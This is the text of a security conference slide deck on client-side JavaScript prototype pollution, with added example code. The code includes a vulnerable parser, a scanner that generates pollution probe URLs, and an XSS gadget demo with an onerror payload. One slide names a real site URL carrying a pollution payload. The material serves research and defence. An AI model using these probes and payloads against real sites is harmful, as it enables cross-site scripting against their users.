Slide 1

Slide 1 text

A tale of making internet pollution free Finding & Exploiting Client-Side Prototype Pollution in the Wild

Slide 2

Slide 2 text

Mohan SRK P ● @s1r1u5_ ● I like browsers, electron and CTFs
Harsh Jaiswal ● @rootxharsh ● Web and shitposting

Slide 3

Slide 3 text

Agenda ● Javascript Prototype ● Prototype Pollution ● Methodology To Find & Exploit Prototype Pollution at Scale ● Case Studies & Results ● Ways To Mitigate Prototype Pollution ● Conclusion

Slide 4

Slide 4 text

Javascript Prototype

Slide 5

Slide 5 text

Javascript Prototype ● JavaScript is a prototype-based language. ● Objects inherit properties and methods via their prototype object. ● Prototype-based inheritance is cool, but it has a security hole.

Slide 6

Slide 6 text

No content

Slide 7

Slide 7 text

No content

Slide 8

Slide 8 text

Prototype Pollution

Slide 9

Slide 9 text

Prototype Pollution ● Properties of Object.prototype are available to every object created in the application through the prototype chain. ● If a malicious user can somehow tamper with Object.prototype, every object in the application will see the tampered property.

Slide 10

Slide 10 text

No content

Slide 11

Slide 11 text

Passed query parameters → ?user=harsh
Resulting query object → {"user": "harsh"}


Slide 12

Slide 12 text

Passed query parameters → ?user[id]=1
Resulting query object → {"user": {"id": 1}}


Slide 13

Slide 13 text

Passed query parameters → ?user[id]=1&__proto__[foo]=bar
Resulting query object → {"user": {"id": 1}}
Where did __proto__ go? Exactly where __proto__ always points: the parser wrote foo onto Object.prototype, so it is not an own key of the result, but ({}).foo is now "bar" for every object in the page.
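The parsing behaviour behind slides 11 to 13, as an added example that is not code from the talk: a minimal bracket-notation query parser of the kind the slides describe, first in its vulnerable form and then hardened so the same input no longer reaches Object.prototype. Function names are assumptions; values stay strings, unlike the slide's pretty-printed 1.

```javascript
// Added example, not code from the talk: a minimal bracket-notation query
// parser of the kind the slides describe (user[id]=1 -> {user: {id: "1"}}),
// first in its vulnerable form and then hardened. Function names are
// assumptions; values stay strings, unlike the slide's pretty-printed 1.

function splitKey(key) {
  // "user[id]" -> ["user", "id"]; "a[b][c]" -> ["a", "b", "c"]
  return key.split(/\]?\[|\]$/).filter(Boolean);
}

function parseQueryVulnerable(qs) {
  const result = {};
  for (const pair of qs.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const [rawKey, rawVal = ''] = pair.split('=');
    const path = splitKey(decodeURIComponent(rawKey));
    let node = result;
    for (let i = 0; i < path.length - 1; i++) {
      // Plain property access: when path[i] is "__proto__" this resolves to
      // Object.prototype, so the final write lands on every object's prototype.
      if (typeof node[path[i]] !== 'object' || node[path[i]] === null) {
        node[path[i]] = {};
      }
      node = node[path[i]];
    }
    node[path[path.length - 1]] = decodeURIComponent(rawVal);
  }
  return result;
}

const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

function parseQuerySafe(qs) {
  const result = {};
  for (const pair of qs.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const [rawKey, rawVal = ''] = pair.split('=');
    const path = splitKey(decodeURIComponent(rawKey));
    // Drop the whole pair if any segment could walk onto a prototype.
    if (path.length === 0 || path.some(seg => FORBIDDEN_SEGMENTS.has(seg))) continue;
    let node = result;
    for (let i = 0; i < path.length - 1; i++) {
      // Only descend into own, plain-object properties, never inherited ones.
      if (!hasOwn(node, path[i]) || typeof node[path[i]] !== 'object' || node[path[i]] === null) {
        node[path[i]] = {};
      }
      node = node[path[i]];
    }
    node[path[path.length - 1]] = decodeURIComponent(rawVal);
  }
  return result;
}

// Reproduces slide 13: the parsed object looks clean, but Object.prototype
// has gained a property that every object in the page now inherits.
function demonstrate() {
  const query = '?user[id]=1&__proto__[foo]=bar';
  const before = ({}).foo;                     // undefined: nothing polluted yet
  const parsed = parseQueryVulnerable(query);  // own keys only: {user: {id: "1"}}
  const after = ({}).foo;                      // "bar": a fresh literal inherits it
  delete Object.prototype.foo;                 // undo the pollution before the safe run
  parseQuerySafe(query);
  const safe = ({}).foo;                       // undefined: the pair was dropped
  return { parsed: JSON.stringify(parsed), before, after, safe };
}

console.log(demonstrate());
```

The hardened version does two things the vulnerable one does not: it refuses any path segment that names a prototype (`__proto__`, `constructor`, `prototype`), and it only descends into own properties, so a lookup can never slide onto the prototype chain even if the denylist is incomplete. Run it with `node` to see the clean-looking result next to the polluted `({}).foo`.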


Slide 14

Slide 14 text

No content

Slide 15

Slide 15 text

Methodology To Find & Exploit Prototype Pollution at Scale

Slide 16

Slide 16 text

Methodology

Slide 17

Slide 17 text

Detection: Selenium script / Nuclei template - Initially used to find sites with vulnerable location parsing, via either the query string or the hash in the URL. - Advantage: scalable. - Disadvantage: only finds vulnerable location parsing; can't scan authenticated pages.

Slide 18

Slide 18 text

No content

Slide 19

Slide 19 text

Detection: Chrome extension - To scan authenticated pages manually, we wrote an extension. - Advantage: can scan authenticated pages. - Disadvantage: only finds vulnerable location parsing; not scalable.
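What both the Selenium/Nuclei scanner (slide 17) and the extension (slide 19) have to do, as an added example rather than the authors' own tooling: build the probe URLs a location-parsing scanner visits, and supply the check it evaluates in the page afterwards. The marker name and value and the set of payload shapes are assumptions; which shape actually lands depends on the parser under test.

```javascript
// Added example, not the authors' Selenium, Nuclei or extension code: the two
// pieces any location-parsing scanner needs, (1) the probe URLs to visit and
// (2) the check to evaluate in the page afterwards. The marker name/value and
// the set of payload shapes are assumptions; which shape works depends on the
// parser under test.

const PROBE_KEY = 'ppscan_marker';
const PROBE_VALUE = 'polluted';

// Common bracket and dot spellings; the constructor.prototype route reaches
// Object.prototype in parsers that refuse the literal "__proto__" key.
const PAYLOAD_SHAPES = [
  (k, v) => `__proto__[${k}]=${v}`,
  (k, v) => `__proto__.${k}=${v}`,
  (k, v) => `constructor[prototype][${k}]=${v}`,
  (k, v) => `constructor.prototype.${k}=${v}`,
];

function buildProbeUrls(target, key = PROBE_KEY, value = PROBE_VALUE) {
  const urls = [];
  for (const shape of PAYLOAD_SHAPES) {
    const payload = shape(key, value);
    // Query-string variant: keep the page's own parameters and append ours.
    const q = new URL(target);
    q.search = (q.search ? q.search + '&' : '?') + payload;
    urls.push(q.href);
    // Hash variant: many libraries parse location.hash with the same code,
    // and the fragment never reaches the server, so server logs stay quiet.
    const h = new URL(target);
    h.hash = '#' + payload;
    urls.push(h.href);
  }
  return urls;
}

// Evaluated in the page context after each navigation (Selenium's
// driver.execute_script, the extension's chrome.scripting.executeScript):
// a fresh object literal must not see the marker unless the page is vulnerable.
function isPolluted(key = PROBE_KEY, value = PROBE_VALUE) {
  return ({})[key] === value;
}

console.log(buildProbeUrls('https://example.com/page?x=1'));
```

The scanner loop itself is a browser task (navigate to each URL, wait for the page's scripts to run, evaluate `isPolluted` in page context, record hits), so it is not reproduced here; the parts above are what you would feed into it. Note that `URL` leaves `[`, `]` and `=` unencoded in both the query and the fragment, which is what the target's parser needs to see.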

Slide 20

Slide 20 text

Detection: Static analysis tool - To find all code components that lead to pollution we need static analysis. - Used CodeQL. - Advantage: can find all sources and sinks that lead to prototype pollution. - Disadvantage: not scalable.

Slide 21

Slide 21 text

Script Gadgets What is a script gadget? A script gadget is a piece of code in the application that can be triggered via prototype pollution and used to upgrade prototype pollution to XSS.

Slide 22

Slide 22 text

Script Gadgets What is a script gadget? A script gadget is a piece of code in the application that can be triggered via prototype pollution and used to upgrade prototype pollution to XSS. - The hard and interesting part after detection. - Most of the time you need to find the gadget yourself. - If you are lucky, pollute.js and untrusted-types can quickly find one. - Idea: this could probably be automated with CodeQL.
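A script gadget of the kind slides 21 and 22 describe, as an added example that is not code from the talk and is modelled without a DOM so it runs in Node. `renderMessage` and its `allowHtml` option are assumptions, but the shape is the usual one: library code reads an option the caller never set, the lookup falls through to Object.prototype, and a polluted value flips the code onto an unsafe path.

```javascript
// Added example, not code from the talk: a script gadget modelled without a
// DOM so it runs in Node. renderMessage and its allowHtml option are
// assumptions, but the shape is the usual one: library code reads an option
// the caller never set, the lookup falls through to Object.prototype, and a
// polluted value flips the code onto an unsafe path.

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// The gadget: callers pass {} or a partial options object, so a missing
// allowHtml is an inherited lookup. In a real page the returned string
// would reach a sink such as innerHTML.
function renderMessage(text, options = {}) {
  const html = options.allowHtml ? text : escapeHtml(text);
  return '<div class="msg">' + html + '</div>';
}

// Hardened variant: only an own, strictly boolean option can disable escaping.
function renderMessageHardened(text, options = {}) {
  const allowHtml =
    Object.prototype.hasOwnProperty.call(options, 'allowHtml') && options.allowHtml === true;
  const html = allowHtml ? text : escapeHtml(text);
  return '<div class="msg">' + html + '</div>';
}

function demonstrateGadget() {
  const payload = '<img src=x onerror=alert(document.domain)>';
  const before = renderMessage(payload);           // escaped, harmless
  // Stand-in for a vulnerable parser handling ?__proto__[allowHtml]=1:
  Object.prototype.allowHtml = '1';
  const after = renderMessage(payload);            // markup passes through: XSS
  const hardened = renderMessageHardened(payload); // still escaped
  delete Object.prototype.allowHtml;               // clean up
  return { before, after, hardened };
}

console.log(demonstrateGadget());
```

This is what a gadget hunt is looking for in minified vendor code: a truthiness check on an option or config field that is usually absent, sitting on the path to an HTML, URL or script-loading sink. The hardened variant shows why a strict own-property check kills the gadget even when pollution still succeeds elsewhere in the page.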

Slide 23

Slide 23 text

Identification of Lib

Slide 24

Slide 24 text

Scanning from DB

Slide 25

Slide 25 text

Case Study: Bug found using CodeQL ● Downloaded JS from the top pages of Google, FB, and some private programs. ● Created a database with CodeQL: codeql database create --language=javascript --source-root database/ vulnerable_db ● Ran the query on the DB: codeql query run --database=./vulnerable_db ../pp-automation/learn.ql

Slide 26

Slide 26 text

Case Study: Bug found using CodeQL

Slide 27

Slide 27 text

Case Study: Apple XSS using the Chrome extension (Rahul's finding). Extension: https://github.com/msrkp/PPScan

Slide 28

Slide 28 text

Case Study: Pollution found using python selenium bot. https://blog.swiftype.com/#__proto__[asdf]=alert(document.domain)

Slide 29

Slide 29 text

Results

Slide 30

Slide 30 text

Results ● Number of vulnerable libraries found: 18 ● Number of bugs reported to vulnerability disclosure programs: ~80 ● Total Bounties earned by ~10 people: ~ 40k

Slide 31

Slide 31 text

Mitigations

Slide 32

Slide 32 text

Mitigations ● Remove the vulnerable code ● Freezing Object.prototype, sealing objects, or using Object.create(null) is not enough ○ For how not to fix it, definitely check BlackFan's talk and the pugpug challenge from BSides Ahmedabad CTF.

Slide 33

Slide 33 text

Conclusion

Slide 34

Slide 34 text

Conclusion ● New attack surface ● Feature proposal: Mitigation for Client-Side Prototype Pollution (WICG/document-policy, GitHub issue #33)

Slide 35

Slide 35 text

Research Team • Sergey Bobrov @Black2Fan • Mohan SRK P @S1r1u5_ • terjanq @terjanq • Beomjin Lee @po6ix • Masato Kinugawa @kinugawamasato • Rahul Maini @iamnoooob • Harsh Jaiswal @rootxharsh • Mikhail Egorov @0ang3el • Nikita Stupin @_nikitastupin

Slide 36

Slide 36 text

Thanks to other researchers • @_holyvier_ • @SecurityMB • @wcbowling • @corb3nik

Slide 37

Slide 37 text

Thanks

Slide 38

Slide 38 text

Questions?